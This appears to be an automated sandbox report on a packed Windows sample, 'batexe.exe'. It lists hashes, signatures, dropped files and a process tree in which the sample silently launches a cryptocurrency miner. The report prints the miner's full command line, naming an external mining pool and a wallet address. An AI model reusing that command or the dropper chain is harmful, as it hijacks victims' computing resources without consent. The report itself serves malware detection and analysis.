73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
296s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
17/02/2024, 11:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1244	b2e.exe
3096	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3096	cpuminer-sse2.exe
3096	cpuminer-sse2.exe
3096	cpuminer-sse2.exe
3096	cpuminer-sse2.exe
3096	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/700-4-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 700 wrote to memory of 1244	700	batexe.exe	73
PID 700 wrote to memory of 1244	700	batexe.exe	73
PID 700 wrote to memory of 1244	700	batexe.exe	73
PID 1244 wrote to memory of 4956	1244	b2e.exe	74
PID 1244 wrote to memory of 4956	1244	b2e.exe	74
PID 1244 wrote to memory of 4956	1244	b2e.exe	74
PID 4956 wrote to memory of 3096	4956	cmd.exe	77
PID 4956 wrote to memory of 3096	4956	cmd.exe	77

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:700
- C:\Users\Admin\AppData\Local\Temp\AE32.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\AE32.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\AE32.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B3B0.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4956
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3096

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\AE32.tmp\b2e.exe

Filesize
1.4MB

MD5
c5e09858066f182b7f5bdcb61d9b36fc

SHA1
7a1de79ffcfa17a7a86a01f8d5046eaf970b8905

SHA256
b5ede4ee58898940fa268a8aa17da9fc31eae634a8c95afcb2412ae199e8f4b6

SHA512
70e4e7cf5ec9df418480b0773c325e489749cbf6b5af491b24f6a6b2298cb043f681689531e70666787d42723d096d57012f1bccf317367908ce68a1420a6dfd

Download Submit
C:\Users\Admin\AppData\Local\Temp\AE32.tmp\b2e.exe

Filesize
1.1MB

MD5
a43a8e689cd5eb2690d211c1d48e729a

SHA1
92acd696234142bf22c8b5f1c1af459f38dc3bf4

SHA256
de564130f2706db8cccf91eb5cda9c55b9cb1cf5c775c3eee2d27c4c63ae5adc

SHA512
d804a9846c745cebd70e25fc740f2d8ab555e3b66ec9a1199539d08a0bf9c7cc4d2122eb5fb65ad6192835649fc0cc55f08ea2572c131c6b1931be3d30991182

Download Submit
C:\Users\Admin\AppData\Local\Temp\B3B0.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
384KB

MD5
eb8ea4d2595402528f73410e2c8651ed

SHA1
23abb385032a9317d00c826eb21e0fe6fc802c50

SHA256
fc3c5c1787c58c465ea47ab132afc59d209b1f7d319ae80a7913ed5c39157017

SHA512
7f4485a662859bdec898bb4f9675c8a834ab570ae7f4df2b6e95a9f5ab45f8fba612d04f0edfe22dc4bdcd3011af0536ed200731262056cd7bec332ce4b18573

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
704KB

MD5
ce5f200d2d48a057722a957d5acc6426

SHA1
e7a8d4c0dc7b561dfa26e3fddaff015716187305

SHA256
cb450c8c0a952560f35f4b93f14357fc3856ee0b016eabf8bb4d20e9504d82df

SHA512
e7d3b203cc96d08b6d000f6845bbeb5777cd08babadbcb86266193ca68d8183973b3a92f5cf587df1f26bf04a182fa51001b7317c9a9e7ba868d1e26b897ee9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
640KB

MD5
ac7d1c3bb4d3c69372907331267c1ee7

SHA1
fa82689799785ef9ab4c304b1c1a6d2d9a961928

SHA256
d22689ab67764158df7b19e8d78ec1393899f21e390f469a300975a31106c3aa

SHA512
0d541661060d7c5eed486ea0377142e7d3883b3c0935114679af28bcae0b1767585fe06328955cf59aab4fe3d4acfba525dbc42675fbce80b7d0b2300784d125

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
704KB

MD5
538d0a2af59454daf4418e27268ec013

SHA1
dd5e047f232d3827ba6f9c1da4f17928557dd6e6

SHA256
ef618dca52a4f65f6fd72fd721744185c44cfeff6ff90928f56481969eab4126

SHA512
1c958d315013726aa6ebc24552fb4d712a30ad6e5621db0f9037924ccb8cdf45063a01ed6da3aa50485ad084248a9c67c3513aabecf9d324eacaaa2b75f0a7c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
641KB

MD5
4d1902e0a5a030ca3c2243ef2db428ea

SHA1
b11091156e3bf657a4b809176e43c86927edd6a9

SHA256
8aca7253c1614cf4a174f18da7ff5d04f6c61f8fce069a6013ad288ea37aac42

SHA512
a341cb5acf319de5f2d0ca8a7f5727fd32cdf0547993eaf56c0ac0e78ff52b13fe11ddb2f47834ddae7143dc8a48a6fadb9ca6287755ee5080b849187a3bb9a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
389KB

MD5
1993268020f88772690c5b86175ae814

SHA1
6b905b987164f3c3b3feef5d1a7f507d6be7fefd

SHA256
90d5a2a74e3afa5ff4ded1298b5b0243fdf4b13552bd8c36facceb8906e7dd68

SHA512
3f87dc89379e3b41f17cef1eb8d99a1d69df191adfc3b99107f375ee6dc6ffa709c6a5212ea69991be27c99e8758ea519da6b243405fbc4396df0a9a2c680d71

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
512KB

MD5
a5993c0dd7587f1716037dcfe1f63091

SHA1
9a4d23ce36f5fc5791692b47d977c0bf92842879

SHA256
568cec1e1bdccf401232a78c8ecf2081fdaea221f0a7c777a69ec61307cca3e3

SHA512
c5457590162dc1a0fd6b179ba94f19e6265e2ca226ea1ec553358f568690bbc158335ee92c297ce699b2928d44702733269f82640d86bb499c1981a5903afc12

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
448KB

MD5
8185100383d0fe360c9198e5a883b08d

SHA1
ab398c469573f8e84d3cfcef01287a0604d6ab5f

SHA256
05ef7288b0d559bf67c3d69c201da9bdcaed0b49ecc538640f7b96c5b82eb538

SHA512
24930ef0caa1f2db2ed60f7dfdb832a172cf7747b0a336b051f73c0087a5f2fabff721487cb49cf5a3bc2be5426554b0a3a0e51541b6a4ca735646af24f1404a

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
320KB

MD5
e748e3357af6e4674ff8962691273b0d

SHA1
0acfc30d68a1ef7c6790a79270864448f70f0aa8

SHA256
84ff770c784909548dbca7bd2a24c8e82338b142f2d4893023e25c52f70e8d14

SHA512
0bd15154698983c85b46810d8fef9092f4d0725882421d6db61f168873af967808c467b924dcb8ee72aaad6e10202edab14916580fc442e14b9d8c85f9d07dcc

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
384KB

MD5
eec15153c344f43f1919cb379b9ee2f9

SHA1
3e4a09390ac885ea2797209603bcfa1ec6ff0cc6

SHA256
4e4d7ecae87e8e656c61af89ef17146baf33fbf09ffbde6ae971d04e8e8f9222

SHA512
7cdf3552341d14979838f8fedf9ac63482152f193ab8f7e0af281ec50b2a43312d78c0e22e79989818c5041538fa69769350e1e6cf0789a165be1eb11ee29908

Download Submit
memory/700-4-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/1244-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1244-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3096-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/3096-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3096-43-0x0000000072E40000-0x0000000072ED8000-memory.dmp

Filesize
608KB

Download
memory/3096-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3096-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3096-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3096-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3096-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3096-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3096-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3096-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3096-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3096-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3096-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download